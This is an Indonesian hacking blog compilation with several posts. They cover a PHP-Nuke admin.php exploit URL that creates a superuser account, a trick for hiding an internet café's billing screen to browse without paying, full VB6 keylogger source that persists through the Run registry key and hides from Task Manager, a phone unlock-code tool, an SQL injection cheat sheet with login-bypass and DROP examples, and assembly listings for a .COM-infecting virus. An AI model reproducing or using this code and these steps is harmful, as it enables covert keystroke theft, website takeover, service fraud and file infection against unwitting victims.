4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya…

Happy Hacking..

Hacking is ART.. ^^
Continue reading...

Bermain Warnet Gratis

Bermain Warnet Gratis

28 October 2009
Penulis: usil · Kategori Artikel: Cracking, Hacking
Binus Hacker Sponsor Banner


Loe Pada Mao Maen Warnet Gratisan?

Yuk Maen Warnet Gratis , Gratisan Maen Di warnet Yok Boy, Tapi Gimana Caranye? Pusing Gw ni Gak Punya Duit! Warnet Gratis Dimana Ya?

PUSING LOE KAN?? Ni Deh Gw Kasi Caranya, dapet dari nyari nyari juga ni:

Heey semuanyaaa! Berjumpa lagi dengan sayaa di tips dan trik! Hahahaaa… Di trik dan tips kali ini aku mau ngejelasin trik tips mengakali warnet dengan menggunakan ZHider! Di sini kita bakalan mencoba berinternet ria di warnet secara murah meriah!! Caranya gampaang! Kalian cuman perlu download Zhider di sini. Untuk selanjutnyaa, aku bakal ngejelasin dulu tentang sistem billing di warnet.
Contoh screen status yg ada di warnet (edelweis)

Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!

Berikut ini langkahnyaaa:

1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
4. Klo ada login screen, kamu login ajah kaya biasa.
5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
6. Klo ZHider dah dibukaa, langsung ajah logout.
7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!

Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).

Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…

Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!

~ G O O D L U C K !~
Continue reading...

Keylogger – Keylogging

Sumber : spyrozone.net

berikut ini source code KeyLogger yang bisa kamu compile pake VB 6.0. Kita hanya butuh sebuah timer dan module.

Yang perlu diperhatikan :

1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:

(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).

2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)

3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)

4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig

5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad

6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user … :(

======= code mulai ==========================

’simpan file hasil compile dg nama regsvc32.exe

‘form

’simpan dg nama FRMLOG.frm

Option Explicit

Private Declare Sub Sleep Lib “kernel32″ (ByVal dwMilliseconds As Long)

Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer

Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Private Declare Function RegisterServiceProcess Lib “kernel32″ (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long

Private Declare Function GetCurrentProcessId Lib “kernel32″ () As Long

Private sAppName As String

Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002

Private Const RSP_SIMPLE_SERVICE = 1

Private Const RSP_UNREGISTER_SERVICE = 0

Private Const VK_BACK = &H8

Private Const VK_CONTROL = &H11

Private Const VK_SHIFT = &H10

Private Const VK_TAB = &H9

Private Const VK_RETURN = &HD

Private Const VK_MENU = &H12

Private Const VK_ESCAPE = &H1B

Private Const VK_CAPITAL = &H14

Private Const VK_SPACE = &H20

Private Const VK_SNAPSHOT = &H2C

Private Const VK_UP = &H26

Private Const VK_DOWN = &H28

Private Const VK_LEFT = &H25

Private Const VK_RIGHT = &H27

Private Const VK_MBUTTON = &H4

Private Const VK_RBUTTON = &H2

Private Const VK_LBUTTON = &H1

Private Const VK_PERIOD = &HBE

Private Const VK_COMMA = &HBC

Private Const VK_NUMLOCK = &H90

Private Const VK_NUMPAD0 = &H60

Private Const VK_NUMPAD1 = &H61

Private Const VK_NUMPAD2 = &H62

Private Const VK_NUMPAD3 = &H63

Private Const VK_NUMPAD4 = &H64

Private Const VK_NUMPAD5 = &H65

Private Const VK_NUMPAD6 = &H66

Private Const VK_NUMPAD7 = &H67

Private Const VK_NUMPAD8 = &H68

Private Const VK_NUMPAD9 = &H69

Private Const VK_F9 = &H78

Private Const VK_F8 = &H77

Private Const VK_F7 = &H76

Private Const VK_F6 = &H75

Private Const VK_F5 = &H74

Private Const VK_F4 = &H73

Private Const VK_F3 = &H72

Private Const VK_F2 = &H71

Private Const VK_F12 = &H7B

Private Const VK_F11 = &H7A

Private Const VK_F10 = &H79

Private Const VK_F1 = &H70

Private Sub LoadTextFile()

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & “settings.ini” For Input As #1

Line Input #1, sAppName

Close

Else

Open App.Path & “\settings.ini” For Input As #1

Line Input #1, sAppName

Close

End If

If sAppName = vbNullString Then

sAppName = “regsvc32″

End If

Exit Sub

dlgerror:

sAppName = “regsvc32″

End Sub

Private Sub SAVEDLL()

Dim nSaveLocation As String

On Error GoTo dlgerror

If Len(App.Path) <= 3 Then

Open App.Path & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & sAppName & “.dll”

GoTo READY

Else

Open App.Path & “\” & sAppName & “.dll” For Append As #1

nSaveLocation = App.Path & “\” & sAppName & “.dll”

GoTo READY

End If

READY:

If txtLOGGED.Text = vbNullString Then

Exit Sub

End If

Print #1, Time & ” ” & Date & vbCrLf & “Size: ” & Format(FileLen(nSaveLocation) / 1000000, “.0″) & ” MB” & vbCrLf & “*** PROGRAMS OPENED ***” & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf

Close

Close

Close

SetAttr nSaveLocation, vbHidden

Exit Sub

dlgerror:

Err.Clear

Exit Sub

End Sub

Private Sub Form_Load()

On Error Resume Next

Call LoadTextFile

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = sAppName

ENTERREGISTRY

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub ENTERREGISTRY()

Dim nKey As Long

RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey

If Len(App.Path) <= 3 Then

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)

Else

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)

End If

End Sub

Private Sub Form_Unload(Cancel As Integer)

Cancel = True

Call SAVEDLL

ENTERREGISTRY

Unload Me

End

End Sub

Private Sub tmrCAPTION_Timer()

On Error Resume Next

Me.Caption = sAppName

Me.Visible = False

App.TaskVisible = False

App.Title = False

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE

End Sub

Private Sub tmrLOG_Timer()

On Error Resume Next

Dim nKey, nChar As Integer

Dim nText As String

For nChar = 1 To 255

nKey = GetAsyncKeyState(nChar)

If nKey = -32767 Then

nText = Chr(nChar)

If nChar = VK_BACK Then

nText = ” {B.S} ”

ElseIf nChar = VK_CONTROL Then

nText = ” {CTRL} ”

ElseIf nChar = VK_SHIFT Then

nText = ” {SHIFT} ”

ElseIf nChar = VK_TAB Then

nText = ” {TAB} ”

ElseIf nChar = VK_RETURN Then

nText = ” {ENTER} ”

ElseIf nChar = VK_MENU Then

nText = ” {ALT} ”

ElseIf nChar = VK_ESCAPE Then

nText = ” {ESC} ”

ElseIf nChar = VK_CAPITAL Then

nText = ” {CAPS} ”

ElseIf nChar = VK_SPACE Then

nText = ” {SP.B} ”

ElseIf nChar = VK_UP Then

nText = ” {UP} ”

ElseIf nChar = VK_LEFT Then

nText = ” {LEFT} ”

ElseIf nChar = VK_RIGHT Then

nText = ” {RIGHT} ”

ElseIf nChar = VK_DOWN Then

nText = ” {DOWN} ”

ElseIf nChar = VK_F1 Then

nText = ” {F1} ”

ElseIf nChar = VK_F2 Then

nText = ” {F2} ”

ElseIf nChar = VK_F3 Then

nText = ” {F3} ”

ElseIf nChar = VK_F4 Then

nText = ” {F4} ”

ElseIf nChar = VK_F5 Then

nText = ” {F5} ”

ElseIf nChar = VK_F6 Then

nText = ” {F6} ”

ElseIf nChar = VK_F7 Then

nText = ” {F7} ”

ElseIf nChar = VK_F8 Then

nText = ” {F8} ”

ElseIf nChar = VK_F9 Then

nText = “{F9}”

ElseIf nChar = VK_F10 Then

nText = ” {F10} ”

ElseIf nChar = VK_F11 Then

nText = ” {F11} ”

ElseIf nChar = VK_F12 Then

nText = ” {F12} ”

ElseIf nChar = VK_SNAPSHOT Then

nText = ” {PRINT SCRN} ”

ElseIf nChar = VK_RBUTTON Then

nText = ” {R.B} ”

ElseIf nChar = VK_LBUTTON Then

nText = ” {L.B} ”

ElseIf nChar = VK_MBUTTON Then

nText = ” {M.B} ”

ElseIf nChar = VK_PERIOD Then

nText = “.”

ElseIf nChar = VK_COMMA Then

nText = “,”

ElseIf nChar = VK_NUMLOCK Then

nText = ” {NUMLCK} ”

ElseIf nChar = VK_NUMPAD0 Then

nText = “0″

ElseIf nChar = VK_NUMPAD1 Then

nText = “1″

ElseIf nChar = VK_NUMPAD2 Then

nText = “2″

ElseIf nChar = VK_NUMPAD3 Then

nText = “3″

ElseIf nChar = VK_NUMPAD4 Then

nText = “4″

ElseIf nChar = VK_NUMPAD5 Then

nText = “5″

ElseIf nChar = VK_NUMPAD6 Then

nText = “6″

ElseIf nChar = VK_NUMPAD7 Then

nText = “7″

ElseIf nChar = VK_NUMPAD8 Then

nText = “8″

ElseIf nChar = VK_NUMPAD9 Then

nText = “9″

End If

txtLOGGED.Text = txtLOGGED.Text + nText

End If

Next

Call GetActiveWindowName

End Sub

Private Sub tmrSAVE_Timer()

Call SAVEDLL

txtLOGGED.Text = vbNullString

txtENUMERATE.Text = vbNullString

End Sub
====code end ===========

============code mulai ============

‘module visual basic

’simpan dg nama mdlActiveWindow.bas

Option Explicit

Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Public Declare Function GetForegroundWindow Lib “user32″ () As Long

Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Public nCAPTION As String

Public nTESTER As Long

Public nClass As String

Public Sub GetActiveWindowName()

nCAPTION = Space(256)

nClass = Space(256)

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)

GetClassName GetForegroundWindow, nClass, Len(nClass)

If nTESTER = GetForegroundWindow Then Exit Sub

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass

nTESTER = GetForegroundWindow

End Sub

============= code end =============

/* ——————————|EOF|—————————— */

sumber : spyrozone.net
###############################################################
Continue reading...

Buka Kode Keamanan Segala Jenis HP

Pusing ketika kita lupa password kode keamanan HP kita? Bingung mau nyari nyari kemana gak ketemu. Trus kita pergi ke counter dengan membayar kurang lebih “Rp.50.000 – Rp.200.000″? Apalagi buat anak kost, wih gile banyak abis duit segitu, apalagi buat anak sekolah sama kuliahan. Ampon dah.. Uang jajan bisa abis buat benerin HP gara² lupa security doank! Nah, ni gw kasi toolsnya. Tinggal download dan gunain deh. Gampang kok, gak bakal nyampe 50.000 degh. Kcuali lw sambil maen game sampe 10 Jam di warnet buat download sambil nge-game. Wkwkw.. Yok dah kite mulai..
Image

Nah, tools ini adalah sebuah aplikasi untuk Unlocking Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola. Nih penjelasan detailnya”

WorldUnlock Kalkulator adalah sebuah aplikasi gratis untuk Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola untuk membuka kode keamanan dan security lainnya.

Include MasterCode kalkulator yang dapat me-reset kode pengaman handphone.

Panduan:
1. Pilih model telepon dari daftar.
2. Masukkan nomor IMEI telepon Anda (Tekan * # 06 # pada telepon)
3· Pilih negara dan penyedia layanan di mana ponsel dibeli.
4· Tekan tombol: Calculate!
5· Nah selanjutnya muncul beberapa unlock codes.
6. 7 kode akan ditampilkan, gunakan kode pertama dimulai dari +7.
7· Jika belum bekerja, coba +1 dan yang terakhir +5.
8· Bila telepon menampilkan “Sim restriction off” itu berarti sudah tidak terkunci.
9· Jika hanya dua kode yang ditampilkan (+1 dan +2) masukkan code tersebut bersamaan!


Kode akan ditampilkan pada form: # pw + CODE + n #
Untuk memperoleh huruf: p, w atau +, tekan tombol * beberapa kali.

Masukkan kode dengan benar dengan menghapus semua simcard dari telepon, kemudian hidupkan telepon kembali dan kemudian masukkan kode.

Fitur “WorldUnlock Codes Calculator” adalah:

· Unlock Nokia
· Unlock LG
· Unlock Panasonic
· Unlock Maxon
· Unlock Samsung
· Unlock AEG/Telital
· Unlock Alcatel
· Unlock Siemens
· Unlock Sony
· Unlock Vitel

NOTE: XP/Vista/7 Is OK :D
DOWNLOAD


Enjoy & Eat It!
Continue reading...

Simple SQL Injection Tutorial

This information is for educational purpose only.
Please use this information wisely.

Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).

Oke, lets’ begin

Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#

Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist

+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist

Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.

Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel

Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
Continue reading...

Pemrograman Virus Komputer

4. 1. Cara Kerja Virus Komputer

Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :

Gambar 4.1. Mekanisme Penularan

Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.

Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :

1.

Kemampuan mendapatkan informasi
2.

Kemampuan memeriksa program
3.

Kemampuan menggandakan diri / menularkan
4.

Kemampuan mengadakan manipulasi
5.

Kemampuan menyembunyikan diri sendiri

Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya

4. 1.1. Kemampuan mendapatkan Informasi

Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :

1. Apakah Extensi File tersebut ( COM,EXE, BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi

Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.

Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.

Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size

Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :

Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file

———

int 21h ; Dos Intrupt
cmp ax,12h ; Ada file lagi

je exit ; kalau tidak ada exit

———

file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start ; akhir kode Virus

Listing 4.1. Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

4. 1. 2. Kemampuan Untuk Memeriksa Program

Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :

Gambar 4.2. Memeriksa Program

Berikut ini contoh listing dari kemampuan untuk memeriksa file

Mov ah, 3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos intrupt
Cmp a,3 ; Cek 3 byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum , infect_file
3_byte equ $ ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file : ; bagian penginfeksian

———— ; rutin infeksi

int 20h ; Dos Exit function
nop ; No Operation

Listing 4.2 . Periksa File

Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows

Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.

4. 1. 3. Kemampuan untuk menggandakan diri / Replicating

kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.

Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.

File bersih program Virus

Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.

Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.

Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :

Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.

Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.

Berikut ini listing dari 44-Virus.Asm :

virus segment
org 100h ; file COM
assume cs:virus

len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
Mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h ; Akhir badan virus “V2″
virus ends

end start

Listing 4.3. Replicating / Penggandaan

4. 1. 4. Kemampuan Mengadakan Manipulasi

Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :

1.

Menampilkan tulisan / kata-kata / gambar
2.

Membunyikan port speaker
3.

Time bomb / logic Bomb

4.1.4.1. Menampilkan Tulisan / gambar

Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.


virus segment
org 100h
assume cs:virus

len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai

msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10

mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h ; Akhir badan virus “V2″

virus ends

